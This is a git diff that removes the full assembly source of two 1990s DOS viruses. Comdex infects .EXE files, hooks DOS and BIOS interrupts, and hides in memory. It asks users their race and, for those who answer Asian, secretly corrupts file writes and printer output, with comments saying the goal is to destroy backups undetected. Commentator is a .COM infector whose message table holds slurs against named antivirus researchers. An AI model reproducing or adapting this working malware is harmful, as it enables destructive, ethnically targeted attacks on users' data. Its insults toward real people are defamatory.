0B4h, 0FFh, 072h, 010h, 0B1h, 003h - db 0B6h, 000h, 0E8h, 0ABh, 0FFh, 0D0h, 0D6h, 0E2h - db 0F9h, 080h, 0C6h, 009h, 0EBh, 0E7h, 0ACh, 08Ah - db 0C8h, 083h, 0C1h, 011h, 0EBh, 00Dh, 0B1h, 003h - db 0E8h, 095h, 0FFh, 0D0h, 0D7h, 0E2h, 0F9h, 0FEh - db 0CFh, 0B1h, 002h, 026h, 08Ah, 001h, 0AAh, 0E2h - db 0FAh, 0E8h, 084h, 0FFh, 073h, 003h, 0A4h, 0EBh - db 0F8h, 0E8h, 07Ch, 0FFh, 0ACh, 0B7h, 0FFh, 08Ah - db 0D8h, 072h, 081h, 0E8h, 072h, 0FFh, 072h, 0D6h - db 03Ah, 0FBh, 075h, 0DDh, 033h, 0EDh, 033h, 0FFh - db 033h, 0F6h, 033h, 0D2h, 033h, 0DBh, 033h, 0C0h - db 0E9h, 07Dh, 0EBh - -last: - -_TEXT ends - end first - \ No newline at end of file diff --git a/c/COMDEX7 (46).ASM b/c/COMDEX7 (46).ASM deleted file mode 100755 index bad65b0..0000000 --- a/c/COMDEX7 (46).ASM +++ /dev/null 
@@ -1,805 +0,0 @@ -; The Comdex exibit guide program -; For the Fall 1991 Comdex Las Vegas Convention -; -; -; A short description of the program: -; -; It only affects .exe files. -; Comdex attaches itself to the end of the programs it affects. -; -; When an affected file is run, Comdex copies itself to top of -; free memory, and modifies the memory blocks, in order to hide from -; memory mapping programs. Some programs may overwrite this area, -; causing the computer to crash. If this happens, the user obviously -; deserved it. -; -; Comdex will hook int 21h and when function 4b (exec) is called -; it sometimes will affect the program being run. It will check every -; program that is run for affection, and if it is not already -; affected, it will be. -; -; Comdex will, after 1 hr, one of 16 chance, ask your race or -; nationality prior to executing a file. Af you answer that you -; are asian/pacific rim, one of 256 file writes will have the -; length adjusted downward or the record size reduced, depending -; upon the specific dos call made. -; -; -; Comdex will remove the read-only attribute before trying to -; affect programs. -; -; Affected files can be easily recognized, since they always end in -; "COMD" -; -; To check for system affection, a byte at 0:33c is used - if it -; contains a 069h, Comdex is installed in memory. -; -; -comsiz equ 128 ;in paragraphs - -code segment para public 'code' - assume cs:code,ds:nothing,ss:nothing,es:nothing - -; -; Comdex is basically divided in the following parts. -; -; 1. the main program - run when an affected program is run. -; it will check if the system is already affected, and if not -; it will install Comdex. -; -; 2. the new int 17 handler. adjusts two ascii output chars. -; -; 3. the new int 14 handler. -; -; 4. the new int 8 handler. -; -; 5. the new int 9 handler. -; -; 6. the new int 21 handler. it will look for exec calls, and -; affect the program being run. 
-; -; -; this is a fake mcb (memory control block) -; ms-dos inspects the chain of mcbs whenever a memory block allocation, -; modification, or release function is requested, or when a program -; is execed or terminated... -; - db 'Z',00,00,comsiz,0,0,0,0,0,0,0,0,0,0,0,0 -; ^___ # of paragraphs of the controlled mem blk - - - -Comdex proc far -; -; Comdex starts by pushing the original start address on the stack, -; so it can transfer control there when finished. -; -labl: sub sp,4 - push bp - mov bp,sp - push ax -;following line nuked for ease of test -; nop ;added so that scan84 doesn't id as [ice-3] - mov ax,es -; -; put the the original cs on the stack. the add ax,data instruction -; is modified by Comdex when it affects other programs. -; - db 05h ;this is an add ax,10h -org_cs dw 0010h - mov [bp+4],ax -; -; put the the original ip on the stack. this mov [bp+2],data instruction -; is modified by Comdex when it affects other programs. -; - db 0c7h,46h,02h -org_ip dw 0000h -; -; save all registers that are modified. -; - push es - push ds - push bx - push cx - push si - push di -; -; check if already installed. quit if so. -; - mov ax,0 - mov es,ax ;zero es - cmp es:[33ch],byte ptr 069h -;&& -; jne l1 -; -; restore all registers and return to the original program. -; -exit: pop di - pop si - pop cx - pop bx - pop ds - pop es - pop ax - pop bp - retf -; -; Comdex tries to hide from detection by modifying the memory block it -; uses, so it seems to be a block that belongs to the operating system. -; -; it looks rather weird, but it seems to work. -; -l1: mov ah,52h - call int21 ;undefined dos call!!? - mov ax,es:[bx-2] - nop - mov es,ax - add ax,es:[0003] - inc ax - inc ax - mov cs:[0001],ax -; -; next, Comdex modifies the memory block of the affected program. -; it is made smaller, and no longer the last block. 
-; - mov bx,ds - dec bx - nop - mov ds,bx - mov al,'M' - mov ds:[0000],al - mov ax,ds:[0003] - sub ax,comsiz - mov ds:[0003],ax - add bx,ax - inc bx -; -; then Comdex moves itself to the new block. -; - mov es,bx - xor si,si - xor di,di - push cs - pop ds - mov cx,652h ;the length of this program - - ;be *sure* to update this!! - ;in fact, make it symbolic!! - cld - rep movsb -; -; Comdex then transfers control to the new copy of itself. -; - push es - nop - mov ax,offset l3 - push ax - retf - db 3dh ;confuse disassemblers -; -; zero some variables -; -l3: mov byte ptr cs:[min60],0 - mov byte ptr cs:[min50],0 - mov word ptr cs:[timer],0 - mov byte ptr cs:[input_char],0 -; -; set flag to confirm installation -; - xor ax,ax - mov es,ax - inc ax ;dummy operation to confuse function - mov byte ptr es:[33ch],069h -; -; hook interrupt 21: -; (the primary dos function interrupt) -; - mov ax,es:[0084h] - mov cs:[old21],ax - mov ax,es:[0086h] - nop - mov cs:[old21+2],ax - mov ax,cs - mov es:[0086h],ax - mov ax,offset new21 - mov es:[0084h],ax -; -; hook interrupt 17: -; (bios lpt services) -; - mov ax,es:[005ch] - mov cs:[old17],ax - nop - mov ax,es:[005eh] - mov cs:[old17+2],ax - inc ax ;dummy op - mov ax,cs - mov es:[005eh],ax - mov ax,offset new17 - mov es:[005ch],ax - -; -; hook interrupt 14: -; (bios serial port services) -; -; mov ax,es:[0050h] -; mov cs:[old17],ax -; mov ax,es:[0052h] -; mov cs:[old14+2],ax -; mov ax,cs -; mov es:[0052h],ax -; mov ax,offset new14 -; mov es:[0050h],ax -; -; -; - cmp word ptr cs:[noinf],5 - jg hook8 - jmp exit -; -; hook interrupt 9 -; (bios keyboard interrupt) -; -;hook9: mov ax,es:[0024h] -; mov cs:[old9],ax -; mov ax,es:[0026h] -; mov cs:[old9+2],ax -; mov ax,cs -; mov es:[0026h],ax -; mov ax,offset new9 -; mov es:[0024h],ax -; -; hook interrupt 8 -; (timer ticks) -; - db 3dh,0cch,03h,3dh,3dh ;confuse dissassemblers -hook8: mov ax,es:[0020h] - mov cs:[old8],ax - mov ax,es:[0022h] - mov cs:[old8+2],ax - mov ax,cs - nop - mov 
es:[0022h],ax - mov ax,offset new8 - mov es:[0020h],ax - jmp exit - - -;the int 21 calls go through this routine to confuse the issue: -int21: push ax - mov ax,0ffh - mov word ptr cs:[internal],ax ;set internal int 21 flag - mov al,20h - inc al ;put 21 in al - mov byte ptr cs:[int21b],al ;self modifying code! - pop ax - db 0cdh ;int opcode -int21b: db 0cch ;overwritten to int 21h - push ax - mov ax,00 - mov word ptr cs:[internal],ax ;clear internal int 21 flag - mov ax,0cch - mov byte ptr cs:[int21b],al ;nuke it back to int 0cch - pop ax - retn - - - - db "Welcome to Comdex " - db "From the Interface Group, Inc. " - db "300 First Avenue " - db "Needham, MA 02194 " - db "(617)449-6600 " - db "For data recovery ask for " - db "Peter J. Bowes, unless you are " - db "Oriental, in which case, we will " - db "not help you. " - -quest db 0dh,0ah,"Software Piracy Prevention Center",0dh,0ah - db "requests your cooperation:",0dh,0ah,0dh,0ah - db "Please enter your race or nationality:",0dh,0ah - db "a. White e. Eastern European",0dh,0ah - db "b. Black f. Soviet",0dh,0ah - db "c. Hispanic g. Western European",0dh,0ah - db "d. Asian/Pacific Rim h. Other",0dh,0ah,0dh,0ah - db " Please enter your response: ","$" - -input_char: db 0 - db 3dh ;confuse disassemblers - -askit: push ax - push bx - push cx - push dx - push si - push di - push ds - push es - - cmp byte ptr cs:[min60],1 ;resident 1 hr yet? - jnz noask - cmp byte ptr cs:[input_char],0 - jnz noask ;don't ask twice - mov ax,word ptr cs:[timer] - and ax,000fh ;look at ls free running clock - cmp ax,000ch ;does it happen to be 00ch? (1 of 16) - jnz noask ;if not, don't ask the guy! 
- - mov dx,offset quest ;ask the guy about race - mov ah,09h ;dos string print - push cs - pop ds - call int21 ;print question on crt - mov ax,0c01h ;dos flush input and get char - call int21 ;get char - and al,0dfh ;force upper case - mov byte ptr cs:[input_char],al ;save away response -noask: pop es - pop ds - pop di - pop si - pop dx - pop cx - pop bx - pop ax - retn - -;******************************************************************** - -; -; int 9 (keyboard) replacement: -; this routine does not become active until 50 minutes after -; the execution of an affected program. -; -;new9: push ax -; push es -; cmp byte ptr cs:[min50],1 -; jnz retx1 - -;insert any code here that activates 50 min after launch for int 9... - -;retx1: pop es ;prepare to go to old int 9 code: -; pop ax -; db 0eah ;jmp 0000:0000 nmemonic -;old9 dw 0,0 ;storage for old addr - - -;******************************************************************** -; -; new int 14 (serial port) routine - -; -;new14: cmp ah,1 ;is it an output request? -; jz s1 ;yup. don't return just yet. -;do14: db 0eah ;jmp 0000:0000 nmemonic -;old14 dw 0,0 -;s1: - -;insert any code here for output to serial port... - -; jmp do14 - - -;******************************************************************** -; -; new int 8 routine (bios timer ticks) -; - db 3dh ;piss off disassemblers -new8: push dx - push cx - push bx - push ax - jmp txex ;&& - inc word ptr cs:[timer] ; increment timer - cmp byte ptr cs:[min60],01 ; if counter >= 60 min. - jz tt0 ; no need to check any more - cmp word ptr cs:[timer],-11 ; 60 minutes ? - jz tt1 - cmp word ptr cs:[timer],54601 ; 50 minutes ? - jz tt2 - jmp txex -; -; 50 minutes after an affected program is run the flag is set. -; -tt2: mov byte ptr cs:[min50],1 - jmp txex -; -; 60 minutes after an affected program is run this flag is set. -; -tt1: mov byte ptr cs:[min60],1 - -; exit interrupt routine: - - jmp txex -; -; every time an int 8 occurs, after the 60 min. 
have passed, we -; end up here: -; -tt0: -;insert any fun timer oriented code here -; -; restore registers and quit -; -txex: pop ax - pop bx - pop cx - pop dx - db 0eah -old8 dw 0,0 - -;******************************************************************** -; -; new int 17 routine. lpt out stuff. -; -new17: jmp do17 ;&& - cmp ah,0 - - jz p0 -do17: db 0eah -old17 dw 0,0 - db 2eh ;confuse disassemblers -p0: cmp byte ptr cs:[input_char],44h ;d. asian/pacific rim? - jne not_asian - push ax - mov ax,word ptr cs:[timer] - and ax,00ffh - cmp ax,0032h ; one of 256 odds - pop ax ; restore ax, doesn't change flags - jne do17 ; don't twiddle lpt 255/256 odds - cmp al,55h ; printing a "U"? - jne notu - mov al,0efh ; make it upside-down! - jmp do17 ; and continue. -notu: cmp al,06fh ; lower case "o"? - jne do17 ; no? then exit. - mov al,093h ; make it an "o" with a ^ over it! - jmp do17 ; and exit. -not_asian: - jmp do17 - - -;Int 21 file adjustment routines - the following routines corrupt a small -;percentage of the file writes that Asians do in their use of the pc. For -;example, when one updates a spreadsheet or exits a word processor, the -;application software will re-write the file out to disk. What we do here -;is reduce the amount of the data that is written to the file. The hope -;is that the problem will be hidden for a significant period of time, since -;it happens only infrequently, and since it typically will happen upon exit -;of the application package. If the reduction of the write causes a serious -;problem (we hope it will) it won't usually be noticed until that file is -;loaded again. The other hope is that if the user does backup his data from -;time to time, this corrupted data will end up on the backup as well before -;the problem is noticed. With luck, maybe the user will assume that the -;hardware is intermittent, and backup the system over the top of his only -;existing backup set, then purchase replacement hardware. 
- - - -fuck_size_f: ;if asian, reduce file rec size by 1 on fcb ops - push ax - push di - push dx ;setup di for indexed operations - pop di - cmp byte ptr cs:[input_char],044h ;asian? - jne exit_fuck_f ;no, then do nothing - mov ax,word ptr cs:[timer] - and ax,00ffh ;mask off ls 8 bits of free run timer - cmp ax,0069h ;does it happen to be 69h? (1 of 256) - jne exit_fuck_f ;nope, so do nothing - - mov al,[ds:di+0] ;get first byte of user's fcb - cmp al,0ffh ;extended fcb? - jne norm_fcb ;nope, so handle as normal fcb - mov ax,[ds:di+15h] ;get record size, 16 bits on extd fcb. - dec ax ;adjust it a bit, since the user really doesn't - ;need to write so much data. - mov [ds:di+15h],ax - jmp exit_fuck_f ;subsequent r/w ops should fail to get the - ;right data until this file is closed or - ;until system crashes. - -norm_fcb: - mov al,[ds:di+0eh] ;get record size, only 8 bits on norm fcb. - dec al ;reduce by 1 - mov [ds:di+0eh],al ;store it back -exit_fuck_f: - pop di - pop ax - jmp do21 - - -fuck_size_h: ;reduce length of handle file writes - push ax - push di - push dx - pop di - cmp byte ptr cs:[input_char],044h ;asian? - jne exit_fuck_h ;no, so don't damage anything. - mov ax,word ptr cs:[timer] - and ax,00ffh - cmp ax,0066h ;one out of 256 odds - jne try_again ;no? well give it another chance. - and cx,0fff5h ;reduce write length in bytes by a flakey amt - dec cx ;ranging from 1 to 11 bytes. -exit_fuck_h: - pop ax - jmp do21 - -try_again: - cmp ax,0077h ;one of 256 odds? - jne exit_fuck_h ;exit if not lucky. - mov ax,[ds:di+30h] ;get a user data byte from his buffer - xor ax,0004h ;toggle bit 2 of byte 30h - mov [ds:di+30h],ax ;and put it back - jmp exit_fuck_h - -;******************************************************************** -; -; this is the int 21 replacement. it only does something in -; the case of an execute program dos call. -; -;be careful here not to trap int codes that we use internally! 
-new21: jmp do21 ;&& - push ax - cmp word ptr cs:[internal],0ffh ;is it an internal int 21? - je do21 ;yup, so no tweaking allowed - pop ax - cmp ah,015h ;is it a fcb file write? - je fuck_size_f ;if asian, reduce record size by 1 - cmp ah,040h ;is it a handle file write? - je fuck_size_h ;if asian, adjust write length down. - cmp ah,4bh ;is it an int 21 code 4b? - je l5 ;yup. go affect stuff -do21: db 0eah ;nope. let dos handle it -old21 dw 0,0 -; -; the code to only affect every tenth program has been removed -; for now. restore this code later. -; - db 3dh ;confuse disassemblers -l5: call askit ;ask race if appropriate - push ax - push bx - push cx - push dx - push si - push ds -; -; search for the file name extension ... -; - mov bx,dx -l6: inc bx - cmp byte ptr [bx],'.' - je l8 - cmp byte ptr [bx],0 - jne l6 -; -; ... and quit unless it starts with "ex". -; -l7: pop ds - pop si - pop dx - pop cx - pop bx - pop ax - jmp do21 -l8: inc bx - cmp word ptr [bx],5845h ;"EX" - jne l7 -; -; when an .exe file is found, Comdex starts by turning off -; the read-only attribute. the read-only attribute is not restored -; when the file has been affected. -; - mov ax,4300h ; get attribute - call int21 - jc l7 - mov ax,4301h ; set attribute - and cx,0feh - call int21 - jc l7 -; -; next, the file is examined to see if it is already affected. -; the signature (4418 5f19) is stored in the last two words. -; - mov ax,3d02h ; open / write access - call int21 - jc l7 - mov bx,ax ; file handle in bx -; -; this part of the code is new: get date of file. -; - mov ax,5700h - call int21 - jc l9 - mov cs:[date1],dx - mov cs:[date2],cx -; - push cs ; now ds is no longer needed - pop ds -; -; the header of the file is read in at [id+8]. Comdex then -; modifies itself, according to the information stored in the -; header. (the original cs and ip addressed are stored). 
-; - mov dx,offset id+8 - mov cx,1ch - mov ah,3fh - call int21 - jc l9 - mov ax,ds:id[1ch] - mov ds:[org_ip],ax - inc ax ;confuse reader a little - mov ax,ds:id[1eh] - add ax,10h - mov ds:[org_cs],ax -; -; next the read/write pointer is moved to the end of the file-4, -; and the last 4 bytes read. they are compared to the signature, -; and if equal nothing happens. -; - mov ax,4202h - mov cx,-1 - mov dx,-4 - call int21 - jc l9 - add ax,4 - mov ds:[len_lo],ax - jnc l8a - inc dx -l8a: mov ds:[len_hi],dx -; -; this part of Comdex is new - check if it is below minimum length -; - cmp dx,0 - jne l8b - mov cl,13 - shr ax,cl - cmp ax,0 - jg l8b - nop - jmp short l9 -l8b: mov ah,3fh - mov cx,4 - mov dx,offset id+4 - call int21 - jnc l11 -l9: mov ah,3eh - call int21 -l10: jmp l7 - db 3eh ;confuse disassemblers -; -; compare to 4f43,444d which is first 4 letters of Comdex -; -l11: mov si,offset id+4 - mov ax,[si] - cmp ax,4f43h ;ascii "OC" - jne l12 - mov ax,[si+2] - cmp ax,444dh ;ascii "DM" - je l9 -; -; the file is not affected, so the next thing Comdex does is -; affect it. first it is padded so the length becomes a multiple -; of 16 bytes. this is done so Comdex code can start at a -; paragraph boundary. -; -l12: mov ax,ds:[len_lo] - and ax,0fh - jz l13 - mov cx,16 - sub cx,ax - nop - add ds:[len_lo],cx - jnc l12a - inc ds:[len_hi] -l12a: mov ah,40h - call int21 ;dos write to file - jc l9 -; -; next the main body of Comdex is written to the end. -; -l13: xor dx,dx - mov cx,offset id + 4 - mov ah,40h ;dos write to file - call int21 - jc l9 -; -; next the .exe file header is modified: -; -; first modify initial ip -; -f0: mov ax,offset labl - mov ds:id[1ch],ax -; -; modify starting cs = Comdex cs. 
it is computed as: -; -; (original length of file+padding)/16 - start of load module -; - mov dx,ds:[len_hi] - mov ax,ds:[len_lo] - mov cl,cs:[const1] ; modified a bit - shr dx,cl - rcr ax,cl - nop - shr dx,cl - rcr ax,cl - shr dx,cl - rcr ax,cl - nop - shr dx,cl - rcr ax,cl - sub ax,ds:id[10h] - mov ds:id[1eh],ax -; -; modify length mod 512 -; - add ds:[len_lo],offset id+4 - jnc l14 - inc ds:[len_hi] -l14: mov ax,ds:[len_lo] - and ax,511 - nop - mov ds:id[0ah],ax -; -; modify number of blocks used -; - mov dx,ds:[len_hi] - mov ax,ds:[len_lo] - add ax,511 - jnc l14a - inc dx -l14a: mov al,ah - mov ah,dl - shr ax,1 - mov ds:id[0ch],ax -; -; finally the modified header is written back to the start of the -; file. -; -wrtback:mov ax,4200h - xor cx,cx - xor dx,dx - call int21 ;dos move file pointer - jc endit - mov ah,40h - mov dx,offset id+8 - mov cx,1ch - call int21 ;dos write to file -; -; this part is new: restore old date. -; - mov dx,cs:[date1] - mov cx,cs:[date2] - mov ax,5701h - call int21 ;dos set file date and time - jc endit - inc word ptr cs:[noinf] -; -; affection is finished - close the file and execute it -; -endit: jmp l9 -; -; - -timer dw 0 ; number of timer (int 8) ticks -const1 db 1 ; the constant 1 -const0 dw 0 ; the constant 0 -internal dw 0 ; internal int 21 in effect. -min50 db 0 ; flag, set to 1 50 minutes after execution -min60 db 0 ; flag, set to 1 60 minutes after execution -vmode db 0 ; video mode -date1 dw ? ; date of file -date2 dw ? ; ditto. -len_lo dw ? -len_hi dw ? -noinf dw 0 ; number of affections -id label word - db "COMD" ; the signature of Comdex. -; -; a buffer, used for data from the file. -; - -Comdex endp -code ends - - end labl - \ No newline at end of file diff --git a/c/COMMENT1 (47).ASM b/c/COMMENT1 (47).ASM deleted file mode 100755 index 96f0f6a..0000000 --- a/c/COMMENT1 (47).ASM +++ /dev/null 
@@ -1,334 +0,0 @@ -;Ŀ -; Commentator Virus by Glenn... -;Ĵ -; This will be a Parasytic Non-Resident .COM infector. -; It will also infect COMMAND.COM. -; -.MODEL TINY - -Public VirLen,MovLen - -Code Segment para 'Code' -Assume Cs:Code,Ds:Code,Es:Code - - Org 100h - -Signature Equ 0DaDah ; Signature of virus! - -Buff1 Equ 0F100h -Buff2 Equ Buff1+2 -VirLen Equ Offset Einde-Offset Begin -MovLen Equ Offset Einde-Offset Mover -DTA Equ 0F000h -Proggie Equ DTA+1Eh -Lenny Equ DTA+1Ah - -MinLen Equ Virlen ;Minimale lengte te besmetten programma -MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma - -; -; This part will contain the actual virus code, for searching the -; next victim and infection of it. -; - -Begin: - Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk - DW Signature ; Herkenningsteken virus -Oversig: - Pushf ;------------------ - Push AX ; Alle registers opslaan voor - Push BX ; later gebruik van het programma - Push CX ; - Push DX ; - Push DS ; - Push ES ; - Push SS ; - Push SI ; - Push DI ;------------------ -InfectPart: - Mov AX,Sprong ;------------------ - Mov Buf1,AX ; Spronggegevens bewaren om - Mov BX,Source ; besmette programma te starten - Mov Buf2,BX ;------------------ - Mov AH,1Ah ; DTA area instellen op - Mov DX,DTA ; $DTA area - Int 21h ;------------------ -Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory - Mov Cx,1 ; - Lea DX,FindPath ; - Int 21h ;------------------ - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -KijkInfected: - Mov DX,Cs:[Lenny] ;------------------ - Cmp DX,MinLen ; Kijken of programmalengte voldoet - Jb ZoekNext ; aan de eisen van het virus - Cmp DX,MaxLen ; - Ja ZoekNext ;------------------ -On2: Mov AH,3Dh ; Zo ja , file openen en file handle - Mov AL,2 ; opslaan - Mov DX,Proggie ; - Int 21h ; - Mov FH,AX ;------------------ - Mov BX,AX ; - Mov AH,3Fh ; Lezen 1e 4 bytes van een file met - Mov CX,4 ; een mogelijk kenmerk van het virus - Mov DX,Buff1 ; - Int 
21h ;------------------ -Sluiten: Mov AH,3Eh ; File weer sluiten - Int 21h ;------------------ - Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 - Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op - Jnz Infect ; morgoth virus. Als bestand al besmet -ZoekNext: - Mov AH,4Fh ;------------------ - Int 21h ; Zoeken naar volgende .COM file - Jnc KijkInfected ; Geen gevonden, goto Afgelopen - Jmp Afgelopen ;------------------ -Infect: - Mov DX,Proggie ; beveiliging weghalen - Mov AH,43h ; - Mov AL,1 ; - Xor CX,Cx - Int 21h ;------------------ - Mov AH,3Dh ; Bestand openen - Mov AL,2 ; - Mov DX,Proggie ; - Int 21h ;------------------ - Mov FH,AX ; Opslaan op stack van - Mov BX,AX ; datum voor later gebruik - Mov AH,57H ; - Mov AL,0 ; - Int 21h ; - Push CX ; - Push DX ;------------------ - Mov AH,3Fh ; Inlezen van eerste deel van het - Mov CX,VirLen+2 ; programma om later terug te - Mov DX,Buff1 ; kunnen plaatsen. - Int 21h ;------------------ - Mov AH,42H ; File Pointer weer naar het - Mov AL,2 ; einde van het programma - Xor CX,CX ; zetten - Xor DX,DX ; - Int 21h ;------------------ - Xor DX,DX ; Bepalen van de variabele sprongen - Add AX,100h ; in het virus (move-routine) - Mov Sprong,AX ; - Add AX,MovLen ; - Mov Source,AX ;------------------ - Mov AH,40H ; Move routine bewaren aan - Mov DX,Offset Mover ; einde van file - Mov CX,MovLen ; - Int 21h ;------------------ - Mov AH,40H ; Eerste deel programma aan- - Mov DX,Buff1 ; voegen na Move routine - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,42h ; File Pointer weer naar - Mov AL,0 ; het begin van file - Xor CX,CX ; sturen - Xor DX,DX ; - Int 21h ;------------------ - Mov AH,40h ; En programma overschrijven - Mov DX,Offset Begin ; met code van het virus - Mov CX,VirLen ; - Int 21h ;------------------ - Mov AH,57h ; Datum van aangesproken file - Mov AL,1 ; weer herstellen - Pop DX ; - Pop CX ; - Int 21h ;------------------ - Mov AH,3Eh ; Sluiten file - Int 21h ;------------------ -Afgelopen: Mov 
BX,Buf2 ; Sprongvariabelen weer - Mov Source,BX ; op normaal zetten voor - Mov AX,Buf1 ; de Move routine - Mov Sprong,AX ;------------------ - Mov AH,1Ah ; DTA adres weer op normaal - Mov Dx,80h ; zetten en naar de Move - Int 21h ; routine springen - Mov Ah,2Ch - Int 21h - Xor DL,DL - Xchg Dh,Dl - Add Dx,Dx -; And Dx,11111110b - Add Dx,Offset MsgTab - Mov Si,Dx - Mov Dx,Cs:[SI] - Mov AH,9 - Int 21h - Jmp CS:[Sprong] ;------------------ - -Msgtab DW offset Msg1 - DW offset Msg2 - DW offset Msg3 - DW offset Msg4 - DW offset Msg5 - DW offset Msg6 - DW offset Msg7 - DW offset Msg8 - DW offset Msg9 - DW offset Msg10 - DW offset Msg11 - DW offset Msg12 - DW offset Msg13 - DW offset Msg14 - DW offset Msg15 - DW offset Msg16 - DW offset Msg17 - DW offset Msg18 - DW offset Msg19 - DW offset Msg20 - DW offset Msg21 - DW offset Msg22 - DW offset Msg23 - DW offset Msg24 - DW offset Msg25 - DW offset Msg26 - DW offset Msg27 - DW offset Msg28 - DW offset Msg29 - DW offset Msg30 - DW offset Msg31 - DW offset Msg32 - DW offset Msg33 - DW offset Msg34 - DW offset Msg35 - DW offset Msg36 - DW offset Msg37 - DW offset Msg38 - DW offset Msg39 - DW offset Msg40 - DW offset Msg41 - DW offset Msg42 - DW offset Msg43 - DW offset Msg44 - DW offset Msg45 - DW offset Msg46 - DW offset Msg47 - DW offset Msg48 - DW offset Msg49 - DW offset Msg50 - DW offset Msg51 - DW offset Msg52 - DW offset Msg53 - DW offset Msg54 - DW offset Msg55 - DW offset Msg56 - DW offset Msg57 - DW offset Msg58 - DW offset Msg59 - DW offset Msg60 - -Msg1 Db 13,10,'McAfee is a bum-hole',13,10,'$' -Msg2 Db 13,10,'Patricia Hoffman is a virgin',13,10,'$' -Msg3 Db 13,10,'David Grant is a shithead',13,10,'$' -Msg4 Db 13,10,'Jan Terpstra sucks',13,10,'$' -Msg5 Db 13,10,'Vesselin Bontchev is a lamer',13,10,'$' -Msg6 Db 13,10,'Righard Zwienenberg is a cowboy',13,10,'$' -Msg7 Db 13,10,'Greetings to Cracker Jack in Italy',13,10,'$' -Msg8 Db 13,10,'MS-DOS could be programmed better',13,10,'$' -Msg9 Db 13,10,'A virus may not hang, 
it must replicate!',13,10,'$' -Msg10 Db 13,10,'(C) by Glenn Benton DVRL',13,10,'$' -Msg11 Db 13,10,'HAHAHA you have a virus',13,10,'$' -Msg12 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' -Msg13 Db 13,10,'Program to big to fit in ass',13,10,'$' -Msg14 Db 13,10,'Another program bites the dust',13,10,'$' -Msg15 Db 13,10,'Havahey! Another Me born to serve',13,10,'$' -Msg16 Db 13,10,'Deicide wasnt that good after all...',13,10,'$' -Msg17 Db 13,10,'DEICIDE, MORGOTH, BREEZE, BROTHER by Glenn Benton',13,10,'$' -Msg18 Db 13,10,'Hey! Gimme some more disks!',13,10,'$' -Msg19 Db 13,10,'Stealth techniques are cool',13,10,'$' -Msg20 Db 13,10,'Encryption is usefull...',13,10,'$' -Msg21 Db 13,10,'Stephanie my lovely girl',13,10,'$' -Msg22 Db 13,10,'FPROT is compiled BASIC',13,10,'$' -Msg23 Db 13,10,'Fuck da police!',13,10,'$' -Msg24 Db 13,10,'Source soon aveable for jokes!',13,10,'$' -Msg25 Db 13,10,'Why dont you play with something else?',13,10,'$' -Msg26 Db 13,10,'Thanks to BORLAND for Turbo Assembler',13,10,'$' -Msg27 Db 13,10,'It is time for NORTON SPEED DISK',13,10,'$' -Msg28 Db 13,10,'Donald duck is a lie...',13,10,'$' -Msg29 Db 13,10,'Why dont you buy me a CHEESEBURGER?',13,10,'$' -Msg30 Db 13,10,'Wim Kok is a COMMUNIST!!!!',13,10,'$' - -Msg31 Db 13,10,'Xabaras could be better',13,10,'$' -Msg32 Db 13,10,'FAT has a nice technique',13,10,'$' -Msg33 Db 13,10,'This virus is not resident!',13,10,'$' -Msg34 Db 13,10,'Nobody like debugging...',13,10,'$' -Msg35 Db 13,10,'60 Messages in here?',13,10,'$' -Msg36 Db 13,10,'Out of worktime',13,10,'$' -Msg37 Db 13,10,'RAM parity error',13,10,'$' -Msg38 Db 13,10,'Insert porn magazine in drive A',13,10,'$' -Msg39 Db 13,10,'Insert tracktor toilet paper in printer',13,10,'$' -Msg40 Db 13,10,'Upload this virus to McAfee, please',13,10,'$' -Msg41 Db 13,10,'HIP-HOP sucks!',13,10,'$' -Msg42 Db 13,10,'Vote for Saddam.',13,10,'$' -Msg43 Db 13,10,'DEAD BY DAWN',13,10,'$' -Msg44 Db 13,10,'NAIL HIM LIKE JESUS!',13,10,'$' -Msg45 Db 13,10,'May 
I fuck with your wife?',13,10,'$' -Msg46 Db 13,10,'Hey CJ! What abouth a Corporation (I&DVRL)',13,10,'$' -Msg47 Db 13,10,'Thanx to Oliver North for giving me TASM',13,10,'$' -Msg48 Db 13,10,'Do not use drugs, make a virus!',13,10,'$' -Msg49 Db 13,10,'Register this produkt!',13,10,'$' -Msg50 Db 13,10,'This virus is SHAREWARE',13,10,'$' -Msg51 Db 13,10,'You will hate me for this',13,10,'$' -Msg52 Db 13,10,'See the sunny side of life',13,10,'$' -Msg53 Db 13,10,'DAME EDNA IS COOL!',13,10,'$' -Msg54 Db 13,10,'I like the pope, the pope smokes dope!',13,10,'$' -Msg55 Db 13,10,'We like the pope, he gives us his dope!',13,10,'$' -Msg56 Db 13,10,'Are you FLINTSTONED???',13,10,'$' -Msg57 Db 13,10,'How about a game of STRIP-POKER?',13,10,'$' -Msg58 Db 13,10,'FACES OF DEATH!',13,10,'$' -Msg59 Db 13,10,'Just one more message!!!',13,10,'$' -Msg60 Db 13,10,'Spread this like hell!',13,10,'$' - -; -; All variables are stored in here, like filehandle, date/time, -; search path and various buffers. -; - -FH DW 0 -FindPath DB '*.COM',0 - -Buf1 DW 0 -Buf2 DW 0 - -Sprong DW 0 -Source DW 0 - -; -; This will contain the relocator routine, located at the end of -; the ORIGINAL file. This will tranfer the 1st part of the program -; to it's original place. -; -Mover: - Mov DI,Offset Begin ;------------------ - Mov SI,Source ; Verplaatsen van het 1e deel - Mov CX,VirLen-1 ; van het programma, wat achter - Rep Movsb ;------------------ - Pop DI ; Opgeslagen registers weer - Pop SI ; terugzetten op originele - Pop SS ; waarde en springen naar - Pop ES ; het begin van het programma - Pop DS ; (waar nu het virus niet meer - Pop DX ; staat) - Pop CX ; - Pop BX ; - Pop AX ; - Popf ; - Mov BX,100h ; - Jmp BX ;------------------ - -; -; Only the end of the virus is stored in here. -; -Einde db 0 - -Code Ends -End Begin - -; -; > and Remember Don't Forget to Call < -; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < -; 
diff --git a/c/COMMENT2 (48).ASM b/c/COMMENT2 (48).ASM
deleted file mode 100755
index 68efded..0000000
--- a/c/COMMENT2 (48).ASM
+++ /dev/null
